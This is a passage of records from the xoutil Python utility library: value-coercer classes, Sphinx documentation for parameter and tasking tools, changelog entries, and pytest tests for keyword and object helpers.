value.\n\n If the returned value is a ``boolean`` (maybe the coercer is a predicate),\n it's converted to a ``logical`` instance.\n\n The wrapped coercer is called in a safe way (inside try/except); if an\n exception is raised the coercer returns ``nil`` and the error is saved in\n the instance attribute ``scope``.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, func):\n super().__init__()\n self.inner = vouch(coercer, func)\n\n def __call__(self, arg):\n try:\n from xotl.tools.symbol import boolean\n\n res = self.inner(arg)\n return logical(res) if isinstance(res, boolean) else res\n except Exception as error:\n self.scope = (arg, error)\n return nil\n\n\nclass compose(custom):\n \"\"\"Returns the composition of several inner `coercers`.\n\n ``compose(f1, ... fn)`` is equivalent to f1(...(fn(arg))...)``.\n\n If no coercer is given return `identity_coerce`:func:.\n\n Could be considered an \"AND\" operator with some light differences because\n the nature of coercers: ordering the coercers is important when some can\n modify (adapt) original values.\n\n If no value results in `coercers`, a default coercer could be given as a\n keyword argument; `identity_coerce` is assumed if missing.\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *coercers, **kwds):\n inner = cls.flatten(coercers, avoid=identity_coerce)\n count = len(inner)\n if count > 1:\n self = super().__new__(cls)\n self.inner = inner\n return self\n elif count == 1:\n return inner[0]\n else:\n res = kwds.pop(\"default\", identity_coerce)\n if not kwds:\n return res\n else:\n msg = '`compose` got unexpected keyword argument(s) \"{}\"'\n raise TypeError(msg.format(set(kwds)))\n\n def __call__(self, arg):\n coercers = self.inner\n i = 0\n res = arg\n ok = True\n while ok and i < len(coercers):\n coerce = coercers[i]\n aux = coerce(res)\n if t(aux):\n i += 1\n else:\n ok = False\n self.scope = (res, coerce)\n res = aux\n return res\n\n\nclass some(custom):\n \"\"\"Represent OR composition of several inner `coercers`.\n\n ``compose(f1, ... fn)`` is equivalent to f1(arg) or f2(arg) ... fn(arg)``\n in the sense \"the first not `nil`\".\n\n If no coercer is given return `void_coerce`:func:.\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *coercers):\n inner = cls.flatten(coercers, avoid=void_coerce)\n if len(inner) > 1:\n self = super().__new__(cls)\n self.inner = inner\n return self\n elif len(inner) == 1:\n return inner[0]\n else:\n return void_coerce\n\n def __call__(self, arg):\n coercers = self.inner\n i = 0\n res = nil\n while res is nil and i < len(coercers):\n coercer = coercers[i]\n value = coercer(arg)\n if t(value):\n res = value\n self.scope = coercer\n else:\n i += 1\n return res\n\n\nclass combo(custom):\n \"\"\"Represent a zip composition of several inner `coercers`.\n\n An instance of this class is constructed from a sequence of coercers and\n the its purpose is coerce a sequence of values. Return a sequence\\\n [#type]_ where each item contains the i-th element from applying the i-th\n coercer to the i-th value from argument sequence::\n\n coercers -> (coercer-1, coercer-2, ... )\n values -> (value-1, value-2, ... )\n combo(coercers)(values) -> (coercer-1(value-1), coercer-2(value-2), ...)\n\n If any value is coerced invalid, the function returns `nil` and the\n combo's instance variable `scope` receives the duple ``(failed-value,\n failed-coercer)``.\n\n The returned sequence is truncated in length to the length of the shortest\n sequence (coercers or arguments).\n\n If no coercer is given, all sequences are coerced as empty.\n\n .. [#type] The returned sequence is of the same type as the argument\n sequence if possible.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, *coercers):\n super().__init__()\n coercers = pargs(coercer)(coercers)\n self.inner = tuple(vouch(coercer, c) for c in coercers)\n\n def __call__(self, arg):\n from collections import Iterable\n\n if isinstance(arg, Iterable):\n coercers = self.inner\n items = iter(arg)\n i = 0\n res = []\n ok = True\n while t(res) and ok and i < len(coercers):\n item = next(items, Unset)\n if item is not Unset:\n coerce = coercers[i]\n value = coerce(item)\n if t(value):\n res.append(value)\n i += 1\n else:\n res = nil\n self.scope = (item, coerce)\n else:\n ok = False\n if t(res):\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n res = nil\n return res\n\n\nclass pargs(custom):\n r\"\"\"Create a inner coercer that check variable argument passing.\n\n Created coercer closure must always receives an argument that is an valid\n iterable with all members coerced properly with the argument of this outer\n creator function.\n\n If the inner closure argument has only a member and this one is not\n properly coerced but it's an iterabled with all members that coerced well,\n this member will be the assumed iterable instead the original argument.\n\n In the following example::\n\n >>> from xotl.tools.values import (iterable, int_coerce)\n\n >>> def foobar(*args):\n ... coerce = iterable(int_coerce)\n ... return coerce(args)\n\n >>> args = (1, 2.0, '3.0')\n >>> foobar(*args)\n (1, 2, 3)\n\n >>> foobar(args)\n nil\n\n An example using `pargs`:class:\\ ::\n\n >>> from xotl.tools.values import (pargs, int_coerce)\n\n >>> def foobar(*args):\n ... # Below, \"coercer\" receives the returned \"inner\"\n ... coerce = pargs(int_coerce)\n ... return coerce(args)\n\n >>> args = (1, 2.0, '3.0')\n >>> foobar(*args)\n (1, 2, 3)\n\n >>> foobar(args)\n (1, 2, 3)\n\n The second form is an example of the real utility of this coercer\n closure: if by error a sequence is passed as it to a function that\n expect a variable number of argument, this coercer fixes it.\n\n Instance variable `scope` stores the last processed invalid argument.\n\n When executed, usually `arg` is a tuple received by a function as\n ``*args`` form.\n\n When executed, returns a tuple, or the same type of source iterable\n argument if possible.\n\n See `xotl.tools.params`:mod: for a more specialized and full function\n arguments conformer.\n\n See `combo`:class: for a combined coercer that validate each member with\n a separate member coercer.\n\n \"\"\"\n __slots__ = ()\n\n def __init__(self, arg_coerce):\n super().__init__()\n self.inner = vouch(coercer, arg_coerce)\n\n def __call__(self, arg):\n from collections import Iterable\n\n coerce = self.inner\n if isinstance(arg, Iterable):\n arg = tuple(arg)\n if len(arg) == 1:\n item = arg[0]\n aux = coerce(item)\n if t(aux):\n res = (aux,)\n elif isinstance(item, Iterable):\n res = Unset\n arg = tuple(item)\n else:\n self.scope = item\n res = nil\n else:\n res = Unset\n if res is Unset:\n res = arg\n i = 0\n while t(res) and i < len(res):\n item = res[i]\n new = coerce(item)\n if t(new):\n if new is not item:\n if isinstance(res, tuple):\n res = list(res)\n res[i] = new\n i += 1\n else:\n self.scope = item\n res = nil\n if t(res):\n res = tuple(res)\n else:\n res = nil\n return res\n\n\nclass iterable(custom):\n \"\"\"Create a inner coercer that coerces an `iterable` member a member.\n\n See constructor for more information.\n\n Return a list, or the same type of source iterable argument if possible.\n\n For example::\n\n >>> from xotl.tools.values import (iterable, int_coerce,\n ... create_unique_member_coerce)\n\n >>> sample = {'1', 1, '1.0'}\n\n >>> sc = iterable(int_coerce)\n >>> sc(set(sample)) == {1}\n True\n\n See `mapping`:class: for more details of this problem. The equivalent\n safe example is::\n\n >>> member_coerce = create_unique_member_coerce(int_coerce, sample)\n >>> sc = iterable(member_coerce)\n >>> sc(set(sample))\n nil\n\n when executed coerces `arg` (an iterable) member a member using\n `member_coercer`. If any member coercion fails, the full execution also\n fails.\n\n There are three types of results when an instance is executed:\n (1) iterables that are coerced without modifications, (2) the modified\n ones but conserving its type, and (3) those that are returned in a list.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, member_coerce, outer_coerce=True):\n \"\"\"Constructor for `iterable`:class: coercers.\n\n :param member_coerce: A coerce to check each iterable member.\n\n :param outer_coerce: A coerce to check the type of the entire\n iterable. Normally a type or tuple of types subclases of\n ``collections.Iterable``.\n\n \"\"\"\n super().__init__()\n member_coerce = vouch(coercer, member_coerce)\n outer_coerce = compose(coercer(outer_coerce), sized_coerce)\n self.inner = (member_coerce, outer_coerce)\n\n def __call__(self, arg):\n from collections import Set, Sequence, MutableSequence\n\n member_coerce, outer_coerce = self.inner\n modified = False\n aux = outer_coerce(arg)\n if t(aux):\n arg = aux\n if isinstance(arg, Sequence):\n res = arg\n retyped = False\n mutable = isinstance(arg, MutableSequence)\n else:\n res = list(arg)\n retyped = mutable = True\n i = 0\n while t(res) and i < len(res):\n item = res[i]\n new = member_coerce(item)\n if t(new):\n if new is not item:\n if not mutable:\n res = list(res)\n retyped = mutable = True\n res[i] = new\n modified = True\n i += 1\n else:\n self.scope = item\n res = nil\n if t(res):\n if isinstance(arg, Set) and not modified:\n res = arg\n elif retyped:\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n self.scope = arg\n res = nil\n return res\n\n\nclass mapping(custom):\n \"\"\"Create a coercer to check dictionaries.\n\n Receives two coercers, one for keys and one for values.\n\n For example::\n\n >>> from xotl.tools.values import (mapping, int_coerce, float_coerce,\n ... create_unique_member_coerce)\n\n >>> sample = {'1': 1, 2.0: '3', 1.0 + 0j: '4.1'}\n\n >>> dc = mapping(int_coerce, float_coerce)\n >>> dc(dict(sample)) == {1: 1.0, 2: 3.0}\n True\n\n When coercing containers it's probable that members become repeated after\n coercing them. This could be not desirable (mainly in sets and\n dictionaries). In those cases use `create_unique_member_coerce`:func: to\n wrap member coercer. For example::\n\n >>> key_coerce = create_unique_member_coerce(int_coerce, sample)\n >>> dc = mapping(key_coerce, float_coerce)\n >>> dc(dict(sample))\n nil\n\n Above problem is because it's the same integer (same hash) coerced\n versions of ``'1'`` and ``1.0+0j``.\n\n This problem of objects of different types that have the same hash is a\n problem to use a example as below::\n\n >>> {1: int, 1.0: float, 1+0j: complex} == {1: complex}\n True\n\n \"\"\"\n\n __slots__ = ()\n _str_join = _repr_join = \":\"\n\n def __new__(cls, key_coercer=Unset, value_coercer=Unset):\n \"\"\"Constructor for `mapping`:class: coercers.\n\n :param key_coercer: A coerce to check each one of the mapping keys.\n\n :param value_coercer: A coerce to check each one of corresponding\n mapping values.\n\n \"\"\"\n from collections import Mapping\n\n if key_coercer is value_coercer is Unset:\n return coercer(Mapping)\n else:\n self = super().__new__(cls)\n key_coercer = vouch(coercer, key_coercer or True)\n value_coercer = vouch(coercer, value_coercer or True)\n self.inner = (key_coercer, value_coercer)\n return self\n\n def __call__(self, arg):\n from collections import Mapping, MutableMapping\n\n if isinstance(arg, Mapping):\n key_coercer, value_coercer = self.inner\n res = arg\n retyped = False\n mutable = isinstance(arg, MutableMapping)\n keys = list(res)\n i = 0\n while t(res) and i < len(keys):\n key = keys[i]\n value = res[key]\n new_key = key_coercer(key)\n if t(new_key):\n new_value = value_coercer(value)\n if t(new_value):\n if new_key is not key or new_value is not value:\n if not mutable:\n res = dict(res)\n retyped = mutable = True\n if key is not new_key:\n del res[key]\n res[new_key] = new_value\n i += 1\n else:\n self.scope = ({key: value}, value_coercer)\n res = nil\n else:\n self.scope = ({key: value}, key_coercer)\n res = nil\n if t(res) and retyped:\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n self.scope = ()\n res = nil\n return res\n\n\ndel re, ABCMeta, lwraps\n" }, { "alpha_fraction": 0.5496063232421875, "alphanum_fraction": 0.5788976550102234, "avg_line_length": 29.528846740722656, "blob_id": "c3c40da42f8876a444ca55954225f2ac8bad9c13", "content_id": "7fef612f0170868b3e670773e56c87133254fd8f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3175, "license_type": "permissive", "max_line_length": 80, "num_lines": 104, "path": "/docs/source/xotl.tools/params.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "===================================================================\n `xotl.tools.params`:mod: -- Tools for managing function arguments\n===================================================================\n\n.. automodule:: xotl.tools.params\n\n\nExamples\n========\n\nIn next example, the parameter key-named \"stream\" could be also passed as name\n\"output\", must be a file, default value is ``stdout``, and if passed as\npositional, could be the first or the last one.\n\n\n >>> import sys\n >>> from xotl.tools.values import file_coerce as is_file\n >>> from xotl.tools.values import positive_int_coerce as positive_int\n >>> from xotl.tools.params import ParamScheme as scheme, ParamSchemeRow as row\n\n >>> sample_scheme = scheme(\n ... row('stream', 0, -1, 'output', default=sys.stdout, coerce=is_file),\n ... row('indent', 0, 1, default=1, coerce=positive_int),\n ... row('width', 0, 1, 2, 'max_width', default=79, coerce=positive_int),\n ... row('newline', default='\\n', coerce=(str, )))\n\n\nSome tests::\n\n >>> def test(*args, **kwargs):\n ... return sample_scheme(args, kwargs)\n\n >>> test(4, 80)\n {'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f927b32b150>,\n 'width': 80}\n\n >>> test(2, '80') # Because positive int coercer use valid string values\n {'indent': 2,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f927b32b150>,\n 'width': 80}\n\n >>> test(sys.stderr, 4, 80)\n {'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stderr>', mode 'w' at 0x7f927b32b1e0>,\n 'width': 80}\n\n >>> test(4, sys.stderr, newline='\\n\\r')\n {'indent': 4,\n 'newline': '\\n\\r',\n 'stream': <open file '<stderr>', mode 'w' at 0x7f927b32b1e0>,\n 'width': 79}\n\n >>> sample_scheme((4, 80), {'extra': 'extra param'}, strict=False)\n {'extra': 'extra param',\n 'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f3c6815c150>,\n 'width': 80}\n\nAnother way of use this is through a `ParamManager`:class: instance, using the\nactual arguments of a function to create it::\n\n >>> def slugify(value, *args, **kwds):\n ... from xotl.tools.params import ParamManager\n ... getarg = ParamManager(args, kwds)\n ... replacement = getarg('replacement', 0, default='-',\n ... coercers=(str, ))\n ... invalid_chars = getarg('invalid_chars', 'invalid', 'invalids', 0,\n ... default='', coercers=_ascii)\n ... valid_chars = getarg('valid_chars', 'valid', 'valids', 0,\n ... default='', coercers=_ascii)\n ... # And so on.\n\nNotice that each call has the same protocol than a parameter definition row\n(see `ParamSchemeRow`:class:).\n\n\nModule Members\n==============\n\n.. autofunction:: issue_9137\n\n.. autofunction:: check_count\n\n.. autofunction:: check_default\n\n.. autofunction:: single\n\n.. autofunction:: pop_keyword_arg\n\n.. autofunction:: pop_keyword_values\n\n.. autoclass:: ParamManager\n :members: __init__, __call__, remainder\n\n.. autoclass:: ParamScheme\n :members: defaults, __call__, __len__, __getitem__, __iter__\n\n.. autoclass:: ParamSchemeRow\n :members: key, default, __call__\n" }, { "alpha_fraction": 0.5611164569854736, "alphanum_fraction": 0.5649663209915161, "avg_line_length": 31.46875, "blob_id": "dd9d43cfb23f362e0dac1f0efbdc31bfe38c5d99", "content_id": "acc7667f7084dca4d5e6480792cbe3317354514c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1040, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/tests/test_keywords.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nfrom xoutil.keywords import getkwd, setkwd, kwd_getter, kwd_setter, org_kwd\n\n\ndef test_keywords():\n class Foobar:\n pass\n\n proper = lambda v: isinstance(v, type) and issubclass(v, Foobar)\n obj = Foobar()\n names = {\"if\", \"and\", \"or\", \"abc\", \"xyz\"}\n for name in names:\n setkwd(obj, name, type(name.title(), (Foobar,), {}))\n for name, value in vars(obj).items():\n if proper(value):\n assert org_kwd(name).title() == value.__name__\n kwd_setter(obj)(\"else\", 123)\n assert obj.if_ is kwd_getter(obj)(\"if\")\n assert obj.and_ is getkwd(obj, \"and\")\n assert obj.xyz is getkwd(obj, \"xyz\")\n assert obj.else_ is getkwd(obj, \"else\")\n keys = {org_kwd(n) for n, v in vars(obj).items() if proper(v)}\n assert keys == names\n" }, { "alpha_fraction": 0.7228260636329651, "alphanum_fraction": 0.7264492511749268, "avg_line_length": 41.46154022216797, "blob_id": "d6db344a07745d5ae41650714904d2856695d887", "content_id": "0f67c78ddab1479ff7a0cbda8880ae540c154743", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 552, "license_type": "permissive", "max_line_length": 77, "num_lines": 13, "path": "/docs/source/history/_changes-1.5.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecated function `xoutil.objects.get_and_del_key`:func:. Use the\n `dict.pop`:meth: directly.\n\n To have consistent naming, renamed `~xoutil.objects.get_and_del_attr`:func:\n and `~xoutil.objects.get_and_del_first_of`:func: to\n `~xoutil.objects.popattr`:func: and `~xoutil.objects.pop_first_of`:func:.\n Old names are left as deprecated aliases.\n\n- Now `xoutil.functools.update_wrapper`:func:, `xoutil.functools.wraps`:func:\n and `xoutil.functools.lru_cache`:func: are Python 3.3 backports (or\n aliases).\n\n- New module `xoutil.textwrap`:mod:.\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6289893388748169, "avg_line_length": 29.079999923706055, "blob_id": "c6a5df7bc46a28cb74a8ff3250c21e8064ea9f58", "content_id": "a3368d560a1beb5db525c7668ab7e9787cfdb36a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 752, "license_type": "permissive", "max_line_length": 130, "num_lines": 25, "path": "/docs/source/xotl.tools/tasking.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "===================================================\n :mod:`xotl.tools.tasking` -- Task oriented tools.\n===================================================\n\n.. automodule:: xotl.tools.tasking\n\n\n.. autoclass:: retrier(max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None)\n :members: decorate\n\n.. autofunction:: retry(fn, args=None, kwargs=None, *, max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None)\n\n.. autoclass:: ConstantWait(wait=DEFAULT_WAIT_INTERVAL)\n\n.. autoclass:: BackoffWait(wait=DEFAULT_WAIT_INTERVAL, backoff=1)\n\n.. autodata:: MIN_WAIT_INTERVAL\n\n.. autodata:: DEFAULT_WAIT_INTERVAL\n\n.. class:: StandardWait\n\n A deprecated alias for `ConstantAlias`:class:.\n\n.. autofunction:: get_backoff_wait\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 24, "blob_id": "8fd517b1e44994c4fb9d424bd7a1cef6eb935785", "content_id": "4e3a470acbd5e98bcdc22c7b6d0510692558b4e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 24, "num_lines": 1, "path": "/xoutil/release.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "../xotl/tools/release.py" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.753125011920929, "avg_line_length": 44.71428680419922, "blob_id": "292ccc2dc74880500399b4e027538321703739ae", "content_id": "db34242397e467c06878d9fe818cce475c756f17", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 320, "license_type": "permissive", "max_line_length": 76, "num_lines": 7, "path": "/docs/source/history/_changes-1.9.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix `xoutil.eight.iteritems`:func:, `xoutil.eight.itervalues`:func: and\n `xoutil.eight.iterkeys`:func: to return an iterator.\n\n- `~xoutil.validators.identifiers.is_valid_identifier`:func: so that it uses\n `str.isidentifier`:meth: in Python 3.\n\n- Add class method `xoutil.future.collections.opendict.from_enum`:meth:\n" }, { "alpha_fraction": 0.7583892345428467, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 36.25, "blob_id": "e43930bbc04045c4bc0104242b5265d275c1815a", "content_id": "34a81bd6fe09fc030c2f12bdf69e6f619d2048df", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 149, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/docs/source/history/_changes-1.6.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Improved the `xoutil.string.normalize_slug`:func: by providing both valid\n and invalid chars.\n\n- Added the `xoutil.string.normalize_ascii`:func:.\n" }, { "alpha_fraction": 0.6881889700889587, "alphanum_fraction": 0.6976377964019775, "avg_line_length": 29.238094329833984, "blob_id": "943b4b6d4e940a278f5345b4110239fecdaf67b6", "content_id": "3bc1fbb10d1fb9a0150d7f5ae18050fa2a13f3df", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 635, "license_type": "permissive", "max_line_length": 77, "num_lines": 21, "path": "/docs/source/xotl.tools/future/inspect.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.inspect`:mod: - Inspect live objects\n=======================================================\n\n.. module:: xotl.tools.future.inspect\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: get_attr_value\n\nWe have backported several Python 3.3 features but maybe not all (some\nprotected structures are not presented in this documentation).\n\n.. autofunction:: getfullargspec\n\n.. autofunction:: getattr_static\n" }, { "alpha_fraction": 0.559222936630249, "alphanum_fraction": 0.5774090886116028, "avg_line_length": 23.979351043701172, "blob_id": "0f7810bf32cd4f1939d5c93225d5a8824eeb020d", "content_id": "cc5febdfd4c9ea8d305dda52712a2941dc4f36c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16937, "license_type": "no_license", "max_line_length": 80, "num_lines": 678, "path": "/tests/test_objects.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.objects import smart_copy\n\n\ndef test_smart_copy():\n class new:\n def __init__(self, **kw):\n for k, v in kw.items():\n setattr(self, k, v)\n\n source = new(a=1, b=2, c=4, _d=5)\n target = {}\n smart_copy(source, target, defaults=False)\n assert target == dict(a=1, b=2, c=4)\n\n source = new(a=1, b=2, c=4, _d=5)\n target = {}\n smart_copy(source, target, defaults=None)\n assert target == dict(a=1, b=2, c=4)\n\n target = {}\n smart_copy(source, target, defaults=True)\n assert target[\"_d\"] == 5\n\n\ndef test_smart_copy_with_defaults():\n defaults = {\n \"host\": \"localhost\",\n \"port\": 5432,\n \"user\": \"openerp\",\n \"password\": (KeyError, \"{key}\"),\n }\n kwargs = {\"password\": \"keep-out!\"}\n args = smart_copy(kwargs, {}, defaults=defaults)\n assert args == dict(\n host=\"localhost\", port=5432, user=\"openerp\", password=\"keep-out!\"\n )\n\n # if missing a required key\n with pytest.raises(KeyError):\n args = smart_copy({}, {}, defaults=defaults)\n\n\ndef test_smart_copy_signature():\n with pytest.raises(TypeError):\n smart_copy({}, defaults=False)\n\n\ndef test_smart_copy_from_dict_to_dict():\n c = dict(c=1, d=23)\n d = dict(d=1)\n smart_copy(c, d)\n assert d == dict(c=1, d=23)\n\n\ndef test_smart_copy_with_plain_defaults():\n c = dict(a=1, b=2, c=3)\n d = {}\n smart_copy(c, d, defaults=(\"a\", \"x\"))\n assert d == dict(a=1, x=None)\n\n\ndef test_smart_copy_with_callable_default():\n def default(attr, source=None):\n return attr in (\"a\", \"b\")\n\n c = dict(a=1, b=\"2\", c=\"3x\")\n d = {}\n smart_copy(c, d, defaults=default)\n assert d == dict(a=1, b=\"2\")\n\n class inset:\n def __init__(self, items):\n self.items = items\n\n def __call__(self, attr, source=None):\n return attr in self.items\n\n c = dict(a=1, b=\"2\", c=\"3x\")\n d = {}\n smart_copy(c, d, defaults=inset(\"ab\"))\n assert d == dict(a=1, b=\"2\")\n\n\ndef test_fulldir():\n from xoutil.objects import fulldir\n\n assert {\"__getitem__\", \"get\", \"items\", \"keys\"} < fulldir({})\n\n\ndef test_newstyle_metaclass():\n class Field:\n __slots__ = (str(\"name\"), str(\"default\"))\n\n def __init__(self, default):\n self.default = default\n\n def __get__(self, inst, owner):\n if not inst:\n return self\n return self.default\n\n class ModelType(type):\n pass\n\n class Base:\n def __init__(self, **attrs):\n self.__dict__.update(attrs)\n\n class Model(metaclass=ModelType):\n f1 = Field(1009)\n f2 = 0\n\n def __init__(self, **attrs):\n self.__dict__.update(attrs)\n\n class Model2(Base, metaclass=ModelType):\n pass\n\n class SubMeta(ModelType):\n pass\n\n class Submodel(Model, metaclass=SubMeta):\n pass\n\n inst = Model(name=\"Instance\")\n assert inst.f1 == 1009\n assert inst.name == \"Instance\"\n assert isinstance(Model.f1, Field)\n assert type(Model) is ModelType\n assert type(Submodel) is SubMeta\n assert type(Model2) is ModelType\n assert Model2.__base__ is Base\n assert Submodel.__base__ is Model\n assert Model.__base__ is object\n\n\ndef test_new_style_metaclass_registration():\n class BaseMeta(type):\n classes = []\n\n def __new__(cls, name, bases, attrs):\n res = super(BaseMeta, cls).__new__(cls, name, bases, attrs)\n cls.classes.append(res) # <-- side effect\n return res\n\n class Base(metaclass=BaseMeta):\n pass\n\n class SubType(BaseMeta):\n pass\n\n class Egg(Base, metaclass=SubType):\n pass\n\n assert Egg.__base__ is Base\n assert len(BaseMeta.classes) == 2\n\n class Spam(Base, metaclass=SubType):\n 'Like \"Egg\" but it will be registered twice in Python 2.x.'\n\n assert len(BaseMeta.classes) == 3 # Properly called once in Python 3\n\n # Nevertheless the bases are ok.\n assert Spam.__bases__ == (Base,)\n\n\ndef test_lazy():\n from xoutil.objects import lazy, setdefaultattr\n\n class new:\n pass\n\n inst = new()\n setter = lambda a: -a\n setdefaultattr(inst, \"c\", lazy(setter, 10))\n assert inst.c == -10\n setdefaultattr(inst, \"c\", lazy(setter, 20))\n assert inst.c == -10\n\n\n# Easly creates a hierarchy of objects\nclass new:\n def __init__(self, **kwargs):\n attrs = {}\n children = {}\n for attr, value in kwargs.items():\n if \".\" in attr:\n name, childattr = attr.split(\".\", 1)\n child = children.setdefault(name, {})\n child[childattr] = value\n else:\n attrs[attr] = value\n self.__dict__.update(attrs)\n assert set(attrs.keys()) & set(children.keys()) == set()\n for child, vals in children.items():\n setattr(self, child, new(**vals))\n\n\ndef test_traversing():\n from xoutil.objects import traverse, get_traverser\n\n obj = new(**{\"a\": 1, \"b.c.d\": {\"x\": 2}, \"b.c.x\": 3})\n assert traverse(obj, \"a\") == 1\n assert traverse(obj, \"b.c.d.x\") == 2\n assert traverse(obj, \"b.c.x\") == 3\n with pytest.raises(AttributeError):\n traverse(obj, \"a.v\")\n with pytest.raises(AttributeError):\n traverse(obj, \"a.b.c.d.y\")\n\n traverser = get_traverser(\"a\", \"b.c.d.x\", \"b.c.d.y\")\n with pytest.raises(AttributeError):\n traverser(obj)\n obj.b.c.d[\"y\"] = None\n assert traverser(obj) == (1, 2, None)\n\n\ndef test_traversing_bug_ignoring_getter():\n import mock\n from xoutil.objects import traverse\n\n sentinel = object()\n\n class Me:\n def __getattr__(self, attr):\n return self\n\n return_sentinel = mock.Mock(return_value=sentinel)\n\n me = Me()\n assert traverse(me, \"x.y\", getter=return_sentinel) is sentinel\n assert return_sentinel.called\n\n\ndef test_dict_merge_base_cases():\n from xoutil.objects import dict_merge\n\n base = {\"a\": \"a\", \"d\": {\"attr1\": 2}}\n assert dict_merge() == {}\n assert dict_merge(base) == base\n assert dict_merge(**base) == base\n\n\ndef test_dict_merge_simple_cases():\n from xoutil.objects import dict_merge\n\n first = {\"a\": {\"attr1\": 1}, \"b\": {\"attr1\": 1}, \"c\": 194, \"shared\": 1}\n second = {\"a\": {\"attr2\": 2}, \"b\": {\"attr2\": 2}, \"d\": 195, \"shared\": 2}\n expected = {\n \"a\": {\"attr1\": 1, \"attr2\": 2},\n \"b\": {\"attr1\": 1, \"attr2\": 2},\n \"c\": 194,\n \"d\": 195,\n \"shared\": 2,\n }\n assert dict_merge(first, second) == expected\n assert dict_merge(first, **second) == expected\n assert dict_merge(second, first) == dict(expected, shared=1)\n assert dict_merge(second, **first) == dict(expected, shared=1)\n\n\ndef test_dict_merge_compatible_cases():\n from xoutil.objects import dict_merge\n\n first = {192: [\"attr1\", 1], 193: {\"attr1\", 1}}\n second = {192: (\"attr2\", 2), 193: [\"attr2\", 2]}\n assert dict_merge(first, second) == {\n 192: [\"attr1\", 1, \"attr2\", 2],\n 193: {\"attr1\", 1, \"attr2\", 2},\n }\n result = dict_merge(second, first)\n assert result[192] == (\"attr2\", 2, \"attr1\", 1)\n key_193 = result[193]\n assert key_193[:2] == [\"attr2\", 2]\n # Since order of set's members is not defined we can't test order, we can\n # only know that they'll be in the last two positions.\n assert key_193.index(\"attr1\") in (2, 3)\n assert key_193.index(1) in (2, 3)\n\n\ndef test_dict_merge_errors():\n from xoutil.objects import dict_merge\n\n first = {192: 192}\n second = {192: [192]}\n with pytest.raises(TypeError):\n dict_merge(second, first)\n with pytest.raises(TypeError):\n dict_merge(first, second)\n\n\ndef test_get_first_of():\n from xoutil.objects import get_first_of\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n assert get_first_of(somedict, \"no\", \"foo\", \"spam\") == \"bar\"\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n assert get_first_of(somedict, \"eggs\") is None\n\n class Someobject:\n pass\n\n inst = Someobject()\n inst.foo = \"bar\"\n inst.eggs = \"spam\"\n assert get_first_of(inst, \"no\", \"eggs\", \"foo\") == \"spam\"\n assert get_first_of(inst, \"invalid\") is None\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n\n class Someobject:\n pass\n\n inst = Someobject()\n inst.foo = \"bar2\"\n inst.eggs = \"spam\"\n assert 